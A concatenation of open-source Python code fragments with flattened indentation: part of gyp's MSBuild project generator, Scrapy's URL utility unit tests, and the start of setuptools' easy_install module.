config_type = _GetMSVSConfigurationType(spec, build_file)
config_type = _ConvertMSVSConfigurationType(config_type)
msbuild_attributes = config.get('msbuild_configuration_attributes', {})
msbuild_attributes.setdefault('ConfigurationType', config_type)
output_dir = msbuild_attributes.get('OutputDirectory',
'$(SolutionDir)$(Configuration)')
msbuild_attributes['OutputDirectory'] = _FixPath(output_dir) + '\\'
if 'IntermediateDirectory' not in msbuild_attributes:
intermediate = _FixPath('$(Configuration)') + '\\'
msbuild_attributes['IntermediateDirectory'] = intermediate
if 'CharacterSet' in msbuild_attributes:
msbuild_attributes['CharacterSet'] = _ConvertMSVSCharacterSet(
msbuild_attributes['CharacterSet'])
if 'TargetName' not in msbuild_attributes:
prefix = spec.get('product_prefix', '')
product_name = spec.get('product_name', '$(ProjectName)')
target_name = prefix + product_name
msbuild_attributes['TargetName'] = target_name
if spec.get('msvs_external_builder'):
external_out_dir = spec.get('msvs_external_builder_out_dir', '.')
msbuild_attributes['OutputDirectory'] = _FixPath(external_out_dir) + '\\'
# Make sure that 'TargetPath' matches 'Lib.OutputFile' or 'Link.OutputFile'
# (depending on the tool used) to avoid MSB8012 warning.
msbuild_tool_map = {
'executable': 'Link',
'shared_library': 'Link',
'loadable_module': 'Link',
'static_library': 'Lib',
}
msbuild_tool = msbuild_tool_map.get(spec['type'])
if msbuild_tool:
msbuild_settings = config['finalized_msbuild_settings']
out_file = msbuild_settings[msbuild_tool].get('OutputFile')
if out_file:
msbuild_attributes['TargetPath'] = _FixPath(out_file)
target_ext = msbuild_settings[msbuild_tool].get('TargetExt')
if target_ext:
msbuild_attributes['TargetExt'] = target_ext
return msbuild_attributes
def _GetMSBuildConfigurationGlobalProperties(spec, configurations, build_file):
# TODO(jeanluc) We could optimize out the following and do it only if
# there are actions.
# TODO(jeanluc) Handle the equivalent of setting 'CYGWIN=nontsec'.
new_paths = []
cygwin_dirs = spec.get('msvs_cygwin_dirs', ['.'])[0]
if cygwin_dirs:
cyg_path = '$(MSBuildProjectDirectory)\\%s\\bin\\' % _FixPath(cygwin_dirs)
new_paths.append(cyg_path)
# TODO(jeanluc) Change the convention to have both a cygwin_dir and a
# python_dir.
python_path = cyg_path.replace('cygwin\\bin', 'python_26')
new_paths.append(python_path)
if new_paths:
new_paths = '$(ExecutablePath);' + ';'.join(new_paths)
properties = {}
for (name, configuration) in sorted(configurations.iteritems()):
condition = _GetConfigurationCondition(name, configuration)
attributes = _GetMSBuildAttributes(spec, configuration, build_file)
msbuild_settings = configuration['finalized_msbuild_settings']
_AddConditionalProperty(properties, condition, 'IntDir',
attributes['IntermediateDirectory'])
_AddConditionalProperty(properties, condition, 'OutDir',
attributes['OutputDirectory'])
_AddConditionalProperty(properties, condition, 'TargetName',
attributes['TargetName'])
if attributes.get('TargetPath'):
_AddConditionalProperty(properties, condition, 'TargetPath',
attributes['TargetPath'])
if attributes.get('TargetExt'):
_AddConditionalProperty(properties, condition, 'TargetExt',
attributes['TargetExt'])
if new_paths:
_AddConditionalProperty(properties, condition, 'ExecutablePath',
new_paths)
tool_settings = msbuild_settings.get('', {})
for name, value in sorted(tool_settings.iteritems()):
formatted_value = _GetValueFormattedForMSBuild('', name, value)
_AddConditionalProperty(properties, condition, name, formatted_value)
return _GetMSBuildPropertyGroup(spec, None, properties)
def _AddConditionalProperty(properties, condition, name, value):
"""Adds a property / conditional value pair to a dictionary.
Arguments:
properties: The dictionary to be modified. The key is the name of the
property. The value is itself a dictionary; its key is the value and
the value a list of condition for which this value is true.
condition: The condition under which the named property has the value.
name: The name of the property.
value: The value of the property.
"""
if name not in properties:
properties[name] = {}
values = properties[name]
if value not in values:
values[value] = []
conditions = values[value]
conditions.append(condition)
# Regex for msvs variable references ( i.e. $(FOO) ).
MSVS_VARIABLE_REFERENCE = re.compile('\$\(([a-zA-Z_][a-zA-Z0-9_]*)\)')
def _GetMSBuildPropertyGroup(spec, label, properties):
"""Returns a PropertyGroup definition for the specified properties.
Arguments:
spec: The target project dict.
label: An optional label for the PropertyGroup.
properties: The dictionary to be converted. The key is the name of the
property. The value is itself a dictionary; its key is the value and
the value a list of condition for which this value is true.
"""
group = ['PropertyGroup']
if label:
group.append({'Label': label})
num_configurations = len(spec['configurations'])
def GetEdges(node):
# Use a definition of edges such that user_of_variable -> used_varible.
# This happens to be easier in this case, since a variable's
# definition contains all variables it references in a single string.
edges = set()
for value in sorted(properties[node].keys()):
# Add to edges all $(...) references to variables.
#
# Variable references that refer to names not in properties are excluded
# These can exist for instance to refer built in definitions like
# $(SolutionDir).
#
# Self references are ignored. Self reference is used in a few places to
# append to the default value. I.e. PATH=$(PATH);other_path
edges.update(set([v for v in MSVS_VARIABLE_REFERENCE.findall(value)
if v in properties and v != node]))
return edges
properties_ordered = gyp.common.TopologicallySorted(
properties.keys(), GetEdges)
# Walk properties in the reverse of a topological sort on
# user_of_variable -> used_variable as this ensures variables are
# defined before they are used.
# NOTE: reverse(topsort(DAG)) = topsort(reverse_edges(DAG))
for name in reversed(properties_ordered):
values = properties[name]
for value, conditions in sorted(values.iteritems()):
if len(conditions) == num_configurations:
# If the value is the same all configurations,
# just add one unconditional entry.
group.append([name, value])
else:
for condition in conditions:
group.append([name, {'Condition': condition}, value])
return [group]
def _GetMSBuildToolSettingsSections(spec, configurations):
groups = []
for (name, configuration) in sorted(configurations.iteritems()):
msbuild_settings = configuration['finalized_msbuild_settings']
group = ['ItemDefinitionGroup',
{'Condition': _GetConfigurationCondition(name, configuration)}
]
for tool_name, tool_settings in sorted(msbuild_settings.iteritems()):
# Skip the tool named '' which is a holder of global settings handled
# by _GetMSBuildConfigurationGlobalProperties.
if tool_name:
if tool_settings:
tool = [tool_name]
for name, value in sorted(tool_settings.iteritems()):
formatted_value = _GetValueFormattedForMSBuild(tool_name, name,
value)
tool.append([name, formatted_value])
group.append(tool)
groups.append(group)
return groups
def _FinalizeMSBuildSettings(spec, configuration):
if 'msbuild_settings' in configuration:
converted = False
msbuild_settings = configuration['msbuild_settings']
MSVSSettings.ValidateMSBuildSettings(msbuild_settings)
else:
converted = True
msvs_settings = configuration.get('msvs_settings', {})
msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(msvs_settings)
include_dirs, resource_include_dirs = _GetIncludeDirs(configuration)
libraries = _GetLibraries(spec)
library_dirs = _GetLibraryDirs(configuration)
out_file, _, msbuild_tool = _GetOutputFilePathAndTool(spec, msbuild=True)
target_ext = _GetOutputTargetExt(spec)
defines = _GetDefines(configuration)
if converted:
# Visual Studio 2010 has TR1
defines = [d for d in defines if d != '_HAS_TR1=0']
# Warn of ignored settings
ignored_settings = ['msvs_prebuild', 'msvs_postbuild', 'msvs_tool_files']
for ignored_setting in ignored_settings:
value = configuration.get(ignored_setting)
if value:
print ('Warning: The automatic conversion to MSBuild does not handle '
'%s. Ignoring setting of %s' % (ignored_setting, str(value)))
defines = [_EscapeCppDefineForMSBuild(d) for d in defines]
disabled_warnings = _GetDisabledWarnings(configuration)
# TODO(jeanluc) Validate & warn that we don't translate
# prebuild = configuration.get('msvs_prebuild')
# postbuild = configuration.get('msvs_postbuild')
def_file = _GetModuleDefinition(spec)
precompiled_header = configuration.get('msvs_precompiled_header')
# Add the information to the appropriate tool
# TODO(jeanluc) We could optimize and generate these settings only if
# the corresponding files are found, e.g. don't generate ResourceCompile
# if you don't have any resources.
_ToolAppend(msbuild_settings, 'ClCompile',
'AdditionalIncludeDirectories', include_dirs)
_ToolAppend(msbuild_settings, 'ResourceCompile',
'AdditionalIncludeDirectories', resource_include_dirs)
# Add in libraries, note that even for empty libraries, we want this
# set, to prevent inheriting default libraries from the enviroment.
_ToolSetOrAppend(msbuild_settings, 'Link', 'AdditionalDependencies',
libraries)
_ToolAppend(msbuild_settings, 'Link', 'AdditionalLibraryDirectories',
library_dirs)
if out_file:
_ToolAppend(msbuild_settings, msbuild_tool, 'OutputFile', out_file,
only_if_unset=True)
if target_ext:
_ToolAppend(msbuild_settings, msbuild_tool, 'TargetExt', target_ext,
only_if_unset=True)
# Add defines.
_ToolAppend(msbuild_settings, 'ClCompile',
'PreprocessorDefinitions', defines)
_ToolAppend(msbuild_settings, 'ResourceCompile',
'PreprocessorDefinitions', defines)
# Add disabled warnings.
_ToolAppend(msbuild_settings, 'ClCompile',
'DisableSpecificWarnings', disabled_warnings)
# Turn on precompiled headers if appropriate.
if precompiled_header:
precompiled_header = os.path.split(precompiled_header)[1]
_ToolAppend(msbuild_settings, 'ClCompile', 'PrecompiledHeader', 'Use')
_ToolAppend(msbuild_settings, 'ClCompile',
'PrecompiledHeaderFile', precompiled_header)
_ToolAppend(msbuild_settings, 'ClCompile',
'ForcedIncludeFiles', [precompiled_header])
# Loadable modules don't generate import libraries;
# tell dependent projects to not expect one.
if spec['type'] == 'loadable_module':
_ToolAppend(msbuild_settings, '', 'IgnoreImportLibrary', 'true')
# Set the module definition file if any.
if def_file:
_ToolAppend(msbuild_settings, 'Link', 'ModuleDefinitionFile', def_file)
configuration['finalized_msbuild_settings'] = msbuild_settings
def _GetValueFormattedForMSBuild(tool_name, name, value):
if type(value) == list:
# For some settings, VS2010 does not automatically extends the settings
# TODO(jeanluc) Is this what we want?
if name in ['AdditionalIncludeDirectories',
'AdditionalLibraryDirectories',
'AdditionalOptions',
'DelayLoadDLLs',
'DisableSpecificWarnings',
'PreprocessorDefinitions']:
value.append('%%(%s)' % name)
# For most tools, entries in a list should be separated with ';' but some
# settings use a space. Check for those first.
exceptions = {
'ClCompile': ['AdditionalOptions'],
'Link': ['AdditionalOptions'],
'Lib': ['AdditionalOptions']}
if tool_name in exceptions and name in exceptions[tool_name]:
char = ' '
else:
char = ';'
formatted_value = char.join(
[MSVSSettings.ConvertVCMacrosToMSBuild(i) for i in value])
else:
formatted_value = MSVSSettings.ConvertVCMacrosToMSBuild(value)
return formatted_value
def _VerifySourcesExist(sources, root_dir):
"""Verifies that all source files exist on disk.
Checks that all regular source files, i.e. not created at run time,
exist on disk. Missing files cause needless recompilation but no otherwise
visible errors.
Arguments:
sources: A recursive list of Filter/file names.
root_dir: The root directory for the relative path names.
Returns:
A list of source files that cannot be found on disk.
"""
missing_sources = []
for source in sources:
if isinstance(source, MSVSProject.Filter):
missing_sources.extend(_VerifySourcesExist(source.contents, root_dir))
else:
if '$' not in source:
full_path = os.path.join(root_dir, source)
if not os.path.exists(full_path):
missing_sources.append(full_path)
return missing_sources
def _GetMSBuildSources(spec, sources, exclusions, extension_to_rule_name,
actions_spec, sources_handled_by_action, list_excluded):
groups = ['none', 'midl', 'include', 'compile', 'resource', 'rule']
grouped_sources = {}
for g in groups:
grouped_sources[g] = []
_AddSources2(spec, sources, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action, list_excluded)
sources = []
for g in groups:
if grouped_sources[g]:
sources.append(['ItemGroup'] + grouped_sources[g])
if actions_spec:
sources.append(['ItemGroup'] + actions_spec)
return sources
def _AddSources2(spec, sources, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action,
list_excluded):
extensions_excluded_from_precompile = []
for source in sources:
if isinstance(source, MSVSProject.Filter):
_AddSources2(spec, source.contents, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action,
list_excluded)
else:
if not source in sources_handled_by_action:
detail = []
excluded_configurations = exclusions.get(source, [])
if len(excluded_configurations) == len(spec['configurations']):
detail.append(['ExcludedFromBuild', 'true'])
else:
for config_name, configuration in sorted(excluded_configurations):
condition = _GetConfigurationCondition(config_name, configuration)
detail.append(['ExcludedFromBuild',
{'Condition': condition},
'true'])
# Add precompile if needed
for config_name, configuration in spec['configurations'].iteritems():
precompiled_source = configuration.get('msvs_precompiled_source', '')
if precompiled_source != '':
precompiled_source = _FixPath(precompiled_source)
if not extensions_excluded_from_precompile:
# If the precompiled header is generated by a C source, we must
# not try to use it for C++ sources, and vice versa.
basename, extension = os.path.splitext(precompiled_source)
if extension == '.c':
extensions_excluded_from_precompile = ['.cc', '.cpp', '.cxx']
else:
extensions_excluded_from_precompile = ['.c']
if precompiled_source == source:
condition = _GetConfigurationCondition(config_name, configuration)
detail.append(['PrecompiledHeader',
{'Condition': condition},
'Create'
])
else:
# Turn off precompiled header usage for source files of a
# different type than the file that generated the
# precompiled header.
for extension in extensions_excluded_from_precompile:
if source.endswith(extension):
detail.append(['PrecompiledHeader', ''])
detail.append(['ForcedIncludeFiles', ''])
group, element = _MapFileToMsBuildSourceType(source,
extension_to_rule_name)
grouped_sources[group].append([element, {'Include': source}] + detail)
def _GetMSBuildProjectReferences(project):
references = []
if project.dependencies:
group = ['ItemGroup']
for dependency in project.dependencies:
guid = dependency.guid
project_dir = os.path.split(project.path)[0]
relative_path = gyp.common.RelativePath(dependency.path, project_dir)
project_ref = ['ProjectReference',
{'Include': relative_path},
['Project', guid],
['ReferenceOutputAssembly', 'false']
]
for config in dependency.spec.get('configurations', {}).itervalues():
# If it's disabled in any config, turn it off in the reference.
if config.get('msvs_2010_disable_uldi_when_referenced', 0):
project_ref.append(['UseLibraryDependencyInputs', 'false'])
break
group.append(project_ref)
references.append(group)
return references
def _GenerateMSBuildProject(project, options, version, generator_flags):
spec = project.spec
configurations = spec['configurations']
project_dir, project_file_name = os.path.split(project.path)
gyp.common.EnsureDirExists(project.path)
# Prepare list of sources and excluded sources.
gyp_path = _NormalizedSource(project.build_file)
relative_path_of_gyp_file = gyp.common.RelativePath(gyp_path, project_dir)
gyp_file = os.path.split(project.build_file)[1]
sources, excluded_sources = _PrepareListOfSources(spec, generator_flags,
gyp_file)
# Add rules.
actions_to_add = {}
props_files_of_rules = set()
targets_files_of_rules = set()
extension_to_rule_name = {}
list_excluded = generator_flags.get('msvs_list_excluded_files', True)
# Don't generate rules if we are using an external builder like ninja.
if not spec.get('msvs_external_builder'):
_GenerateRulesForMSBuild(project_dir, options, spec,
sources, excluded_sources,
props_files_of_rules, targets_files_of_rules,
actions_to_add, extension_to_rule_name)
else:
rules = spec.get('rules', [])
_AdjustSourcesForRules(spec, rules, sources, excluded_sources)
sources, excluded_sources, excluded_idl = (
_AdjustSourcesAndConvertToFilterHierarchy(spec, options,
project_dir, sources,
excluded_sources,
list_excluded, version))
# Don't add actions if we are using an external builder like ninja.
if not spec.get('msvs_external_builder'):
_AddActions(actions_to_add, spec, project.build_file)
_AddCopies(actions_to_add, spec)
# NOTE: this stanza must appear after all actions have been decided.
# Don't excluded sources with actions attached, or they won't run.
excluded_sources = _FilterActionsFromExcluded(
excluded_sources, actions_to_add)
exclusions = _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl)
actions_spec, sources_handled_by_action = _GenerateActionsForMSBuild(
spec, actions_to_add)
_GenerateMSBuildFiltersFile(project.path + '.filters', sources,
extension_to_rule_name)
missing_sources = _VerifySourcesExist(sources, project_dir)
for configuration in configurations.itervalues():
_FinalizeMSBuildSettings(spec, configuration)
# Add attributes to root element
import_default_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.Default.props'}]]
import_cpp_props_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.props'}]]
import_cpp_targets_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.targets'}]]
macro_section = [['PropertyGroup', {'Label': 'UserMacros'}]]
content = [
'Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003',
'ToolsVersion': version.ProjectVersion(),
'DefaultTargets': 'Build'
}]
content += _GetMSBuildProjectConfigurations(configurations)
content += _GetMSBuildGlobalProperties(spec, project.guid, project_file_name)
content += import_default_section
content += _GetMSBuildConfigurationDetails(spec, project.build_file)
content += _GetMSBuildLocalProperties(project.msbuild_toolset)
content += import_cpp_props_section
content += _GetMSBuildExtensions(props_files_of_rules)
content += _GetMSBuildPropertySheets(configurations)
content += macro_section
content += _GetMSBuildConfigurationGlobalProperties(spec, configurations,
project.build_file)
content += _GetMSBuildToolSettingsSections(spec, configurations)
content += _GetMSBuildSources(
spec, sources, exclusions, extension_to_rule_name, actions_spec,
sources_handled_by_action, list_excluded)
content += _GetMSBuildProjectReferences(project)
content += import_cpp_targets_section
content += _GetMSBuildExtensionTargets(targets_files_of_rules)
if spec.get('msvs_external_builder'):
content += _GetMSBuildExternalBuilderTargets(spec)
# TODO(jeanluc) File a bug to get rid of runas. We had in MSVS:
# has_run_as = _WriteMSVSUserFile(project.path, version, spec)
easy_xml.WriteXmlIfChanged(content, project.path, pretty=True, win32=True)
return missing_sources
def _GetMSBuildExternalBuilderTargets(spec):
"""Return a list of MSBuild targets for external builders.
Right now, only "Build" and "Clean" targets are generated.
Arguments:
spec: The gyp target spec.
Returns:
List of MSBuild 'Target' specs.
"""
build_cmd = _BuildCommandLineForRuleRaw(
spec, spec['msvs_external_builder_build_cmd'],
False, False, False, False)
build_target = ['Target', {'Name': 'Build'}]
build_target.append(['Exec', {'Command': build_cmd}])
clean_cmd = _BuildCommandLineForRuleRaw(
spec, spec['msvs_external_builder_clean_cmd'],
False, False, False, False)
clean_target = ['Target', {'Name': 'Clean'}]
clean_target.append(['Exec', {'Command': clean_cmd}])
return [build_target, clean_target]
def _GetMSBuildExtensions(props_files_of_rules):
extensions = ['ImportGroup', {'Label': 'ExtensionSettings'}]
for props_file in props_files_of_rules:
extensions.append(['Import', {'Project': props_file}])
return [extensions]
def _GetMSBuildExtensionTargets(targets_files_of_rules):
targets_node = ['ImportGroup', {'Label': 'ExtensionTargets'}]
for targets_file in sorted(targets_files_of_rules):
targets_node.append(['Import', {'Project': targets_file}])
return [targets_node]
def _GenerateActionsForMSBuild(spec, actions_to_add):
"""Add actions accumulated into an actions_to_add, merging as needed.
Arguments:
spec: the target project dict
actions_to_add: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
Returns:
A pair of (action specification, the sources handled by this action).
"""
sources_handled_by_action = OrderedSet()
actions_spec = []
for primary_input, actions in actions_to_add.iteritems():
inputs = OrderedSet()
outputs = OrderedSet()
descriptions = []
commands = []
for action in actions:
inputs.update(OrderedSet(action['inputs']))
outputs.update(OrderedSet(action['outputs']))
descriptions.append(action['description'])
cmd = action['command']
# For most actions, add 'call' so that actions that invoke batch files
# return and continue executing. msbuild_use_call provides a way to
# disable this but I have not seen any adverse effect from doing that
# for everything.
if action.get('msbuild_use_call', True):
cmd = 'call ' + cmd
commands.append(cmd)
# Add the custom build action for one input file.
description = ', and also '.join(descriptions)
# We can't join the commands simply with && because the command line will
# get too long. See also _AddActions: cygwin's setup_env mustn't be called
# for every invocation or the command that sets the PATH will grow too
# long.
command = (
'\r\nif %errorlevel% neq 0 exit /b %errorlevel%\r\n'.join(commands))
_AddMSBuildAction(spec,
primary_input,
inputs,
outputs,
command,
description,
sources_handled_by_action,
actions_spec)
return actions_spec, sources_handled_by_action
def _AddMSBuildAction(spec, primary_input, inputs, outputs, cmd, description,
sources_handled_by_action, actions_spec):
command = MSVSSettings.ConvertVCMacrosToMSBuild(cmd)
primary_input = _FixPath(primary_input)
inputs_array = _FixPaths(inputs)
outputs_array = _FixPaths(outputs)
additional_inputs = ';'.join([i for i in inputs_array
if i != primary_input])
outputs = ';'.join(outputs_array)
sources_handled_by_action.add(primary_input)
action_spec = ['CustomBuild', {'Include': primary_input}]
action_spec.extend(
# TODO(jeanluc) 'Document' for all or just if as_sources?
[['FileType', 'Document'],
['Command', command],
['Message', description],
['Outputs', outputs]
])
if additional_inputs:
action_spec.append(['AdditionalInputs', additional_inputs])
actions_spec.append(action_spec) | unknown | codeparrot/codeparrot-clean | ||
import unittest
from scrapy.spiders import Spider
from scrapy.utils.url import url_is_from_any_domain, url_is_from_spider, canonicalize_url
__doctests__ = ['scrapy.utils.url']
class UrlUtilsTest(unittest.TestCase):
def test_url_is_from_any_domain(self):
url = 'http://www.wheele-bin-art.co.uk/get/product/123'
self.assertTrue(url_is_from_any_domain(url, ['wheele-bin-art.co.uk']))
self.assertFalse(url_is_from_any_domain(url, ['art.co.uk']))
url = 'http://wheele-bin-art.co.uk/get/product/123'
self.assertTrue(url_is_from_any_domain(url, ['wheele-bin-art.co.uk']))
self.assertFalse(url_is_from_any_domain(url, ['art.co.uk']))
url = 'http://www.Wheele-Bin-Art.co.uk/get/product/123'
self.assertTrue(url_is_from_any_domain(url, ['wheele-bin-art.CO.UK']))
self.assertTrue(url_is_from_any_domain(url, ['WHEELE-BIN-ART.CO.UK']))
url = 'http://192.169.0.15:8080/mypage.html'
self.assertTrue(url_is_from_any_domain(url, ['192.169.0.15:8080']))
self.assertFalse(url_is_from_any_domain(url, ['192.169.0.15']))
url = 'javascript:%20document.orderform_2581_1190810811.mode.value=%27add%27;%20javascript:%20document.orderform_2581_1190810811.submit%28%29'
self.assertFalse(url_is_from_any_domain(url, ['testdomain.com']))
self.assertFalse(url_is_from_any_domain(url+'.testdomain.com', ['testdomain.com']))
def test_url_is_from_spider(self):
spider = Spider(name='example.com')
self.assertTrue(url_is_from_spider('http://www.example.com/some/page.html', spider))
self.assertTrue(url_is_from_spider('http://sub.example.com/some/page.html', spider))
self.assertFalse(url_is_from_spider('http://www.example.org/some/page.html', spider))
self.assertFalse(url_is_from_spider('http://www.example.net/some/page.html', spider))
def test_url_is_from_spider_class_attributes(self):
class MySpider(Spider):
name = 'example.com'
self.assertTrue(url_is_from_spider('http://www.example.com/some/page.html', MySpider))
self.assertTrue(url_is_from_spider('http://sub.example.com/some/page.html', MySpider))
self.assertFalse(url_is_from_spider('http://www.example.org/some/page.html', MySpider))
self.assertFalse(url_is_from_spider('http://www.example.net/some/page.html', MySpider))
def test_url_is_from_spider_with_allowed_domains(self):
spider = Spider(name='example.com', allowed_domains=['example.org', 'example.net'])
self.assertTrue(url_is_from_spider('http://www.example.com/some/page.html', spider))
self.assertTrue(url_is_from_spider('http://sub.example.com/some/page.html', spider))
self.assertTrue(url_is_from_spider('http://example.com/some/page.html', spider))
self.assertTrue(url_is_from_spider('http://www.example.org/some/page.html', spider))
self.assertTrue(url_is_from_spider('http://www.example.net/some/page.html', spider))
self.assertFalse(url_is_from_spider('http://www.example.us/some/page.html', spider))
spider = Spider(name='example.com', allowed_domains=set(('example.com', 'example.net')))
self.assertTrue(url_is_from_spider('http://www.example.com/some/page.html', spider))
spider = Spider(name='example.com', allowed_domains=('example.com', 'example.net'))
self.assertTrue(url_is_from_spider('http://www.example.com/some/page.html', spider))
def test_url_is_from_spider_with_allowed_domains_class_attributes(self):
class MySpider(Spider):
name = 'example.com'
allowed_domains = ('example.org', 'example.net')
self.assertTrue(url_is_from_spider('http://www.example.com/some/page.html', MySpider))
self.assertTrue(url_is_from_spider('http://sub.example.com/some/page.html', MySpider))
self.assertTrue(url_is_from_spider('http://example.com/some/page.html', MySpider))
self.assertTrue(url_is_from_spider('http://www.example.org/some/page.html', MySpider))
self.assertTrue(url_is_from_spider('http://www.example.net/some/page.html', MySpider))
self.assertFalse(url_is_from_spider('http://www.example.us/some/page.html', MySpider))
def test_canonicalize_url(self):
# simplest case
self.assertEqual(canonicalize_url("http://www.example.com/"),
"http://www.example.com/")
# always return a str
assert isinstance(canonicalize_url(u"http://www.example.com"), str)
# append missing path
self.assertEqual(canonicalize_url("http://www.example.com"),
"http://www.example.com/")
# typical usage
self.assertEqual(canonicalize_url("http://www.example.com/do?a=1&b=2&c=3"),
"http://www.example.com/do?a=1&b=2&c=3")
self.assertEqual(canonicalize_url("http://www.example.com/do?c=1&b=2&a=3"),
"http://www.example.com/do?a=3&b=2&c=1")
self.assertEqual(canonicalize_url("http://www.example.com/do?&a=1"),
"http://www.example.com/do?a=1")
# sorting by argument values
self.assertEqual(canonicalize_url("http://www.example.com/do?c=3&b=5&b=2&a=50"),
"http://www.example.com/do?a=50&b=2&b=5&c=3")
# using keep_blank_values
self.assertEqual(canonicalize_url("http://www.example.com/do?b=&a=2", keep_blank_values=False),
"http://www.example.com/do?a=2")
self.assertEqual(canonicalize_url("http://www.example.com/do?b=&a=2"),
"http://www.example.com/do?a=2&b=")
self.assertEqual(canonicalize_url("http://www.example.com/do?b=&c&a=2", keep_blank_values=False),
"http://www.example.com/do?a=2")
self.assertEqual(canonicalize_url("http://www.example.com/do?b=&c&a=2"),
"http://www.example.com/do?a=2&b=&c=")
self.assertEqual(canonicalize_url(u'http://www.example.com/do?1750,4'),
'http://www.example.com/do?1750%2C4=')
# spaces
self.assertEqual(canonicalize_url("http://www.example.com/do?q=a space&a=1"),
"http://www.example.com/do?a=1&q=a+space")
self.assertEqual(canonicalize_url("http://www.example.com/do?q=a+space&a=1"),
"http://www.example.com/do?a=1&q=a+space")
self.assertEqual(canonicalize_url("http://www.example.com/do?q=a%20space&a=1"),
"http://www.example.com/do?a=1&q=a+space")
# normalize percent-encoding case (in paths)
self.assertEqual(canonicalize_url("http://www.example.com/a%a3do"),
"http://www.example.com/a%A3do"),
# normalize percent-encoding case (in query arguments)
self.assertEqual(canonicalize_url("http://www.example.com/do?k=b%a3"),
"http://www.example.com/do?k=b%A3")
# non-ASCII percent-encoding in paths
self.assertEqual(canonicalize_url("http://www.example.com/a do?a=1"),
"http://www.example.com/a%20do?a=1"),
self.assertEqual(canonicalize_url("http://www.example.com/a %20do?a=1"),
"http://www.example.com/a%20%20do?a=1"),
self.assertEqual(canonicalize_url("http://www.example.com/a do\xc2\xa3.html?a=1"),
"http://www.example.com/a%20do%C2%A3.html?a=1")
# non-ASCII percent-encoding in query arguments
self.assertEqual(canonicalize_url(u"http://www.example.com/do?price=\xa3500&a=5&z=3"),
u"http://www.example.com/do?a=5&price=%C2%A3500&z=3")
self.assertEqual(canonicalize_url("http://www.example.com/do?price=\xc2\xa3500&a=5&z=3"),
"http://www.example.com/do?a=5&price=%C2%A3500&z=3")
self.assertEqual(canonicalize_url("http://www.example.com/do?price(\xc2\xa3)=500&a=1"),
"http://www.example.com/do?a=1&price%28%C2%A3%29=500")
# urls containing auth and ports
self.assertEqual(canonicalize_url(u"http://user:pass@www.example.com:81/do?now=1"),
u"http://user:pass@www.example.com:81/do?now=1")
# remove fragments
self.assertEqual(canonicalize_url(u"http://user:pass@www.example.com/do?a=1#frag"),
u"http://user:pass@www.example.com/do?a=1")
self.assertEqual(canonicalize_url(u"http://user:pass@www.example.com/do?a=1#frag", keep_fragments=True),
u"http://user:pass@www.example.com/do?a=1#frag")
# dont convert safe characters to percent encoding representation
self.assertEqual(canonicalize_url(
"http://www.simplybedrooms.com/White-Bedroom-Furniture/Bedroom-Mirror:-Josephine-Cheval-Mirror.html"),
"http://www.simplybedrooms.com/White-Bedroom-Furniture/Bedroom-Mirror:-Josephine-Cheval-Mirror.html")
# urllib.quote uses a mapping cache of encoded characters. when parsing
# an already percent-encoded url, it will fail if that url was not
# percent-encoded as utf-8, that's why canonicalize_url must always
# convert the urls to string. the following test asserts that
# functionality.
self.assertEqual(canonicalize_url(u'http://www.example.com/caf%E9-con-leche.htm'),
'http://www.example.com/caf%E9-con-leche.htm')
# domains are case insensitive
self.assertEqual(canonicalize_url("http://www.EXAMPLE.com/"),
"http://www.example.com/")
# quoted slash and question sign
self.assertEqual(canonicalize_url("http://foo.com/AC%2FDC+rocks%3f/?yeah=1"),
"http://foo.com/AC%2FDC+rocks%3F/?yeah=1")
self.assertEqual(canonicalize_url("http://foo.com/AC%2FDC/"),
"http://foo.com/AC%2FDC/")
if __name__ == "__main__":
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
"""
Easy Install
------------
A tool for doing automatic download/extract/build of distutils-based Python
packages. For detailed documentation, see the accompanying EasyInstall.txt
file, or visit the `EasyInstall home page`__.
__ https://pythonhosted.org/setuptools/easy_install.html
"""
from glob import glob
from distutils.util import get_platform
from distutils.util import convert_path, subst_vars
from distutils.errors import DistutilsArgError, DistutilsOptionError, \
DistutilsError, DistutilsPlatformError
from distutils.command.install import INSTALL_SCHEMES, SCHEME_KEYS
from distutils import log, dir_util
from distutils.command.build_scripts import first_line_re
import sys
import os
import zipimport
import shutil
import tempfile
import zipfile
import re
import stat
import random
import platform
import textwrap
import warnings
import site
import struct
import contextlib
import subprocess
import shlex
from setuptools import Command
from setuptools.sandbox import run_setup
from setuptools.py31compat import get_path, get_config_vars
from setuptools.command import setopt
from setuptools.archive_util import unpack_archive
from setuptools.package_index import PackageIndex
from setuptools.package_index import URL_SCHEME
from setuptools.command import bdist_egg, egg_info
from setuptools.compat import (iteritems, maxsize, basestring, unicode,
reraise, PY2, PY3)
from pkg_resources import (
yield_lines, normalize_path, resource_string, ensure_directory,
get_distribution, find_distributions, Environment, Requirement,
Distribution, PathMetadata, EggMetadata, WorkingSet, DistributionNotFound,
VersionConflict, DEVELOP_DIST,
)
import pkg_resources
# Turn on PEP440Warnings
warnings.filterwarnings("default", category=pkg_resources.PEP440Warning)
__all__ = [
'samefile', 'easy_install', 'PthDistributions', 'extract_wininst_cfg',
'main', 'get_exe_prefixes',
]
def is_64bit():
return struct.calcsize("P") == 8
def samefile(p1, p2):
both_exist = os.path.exists(p1) and os.path.exists(p2)
use_samefile = hasattr(os.path, 'samefile') and both_exist
if use_samefile:
return os.path.samefile(p1, p2)
norm_p1 = os.path.normpath(os.path.normcase(p1))
norm_p2 = os.path.normpath(os.path.normcase(p2))
return norm_p1 == norm_p2
if PY2:
def _to_ascii(s):
return s
def isascii(s):
try:
unicode(s, 'ascii')
return True
except UnicodeError:
return False
else:
def _to_ascii(s):
return s.encode('ascii')
def isascii(s):
try:
s.encode('ascii')
return True
except UnicodeError:
return False
class easy_install(Command):
"""Manage a download/build/install process"""
description = "Find/get/install Python packages"
command_consumes_arguments = True
user_options = [
('prefix=', None, "installation prefix"),
("zip-ok", "z", "install package as a zipfile"),
("multi-version", "m", "make apps have to require() a version"),
("upgrade", "U", "force upgrade (searches PyPI for latest versions)"),
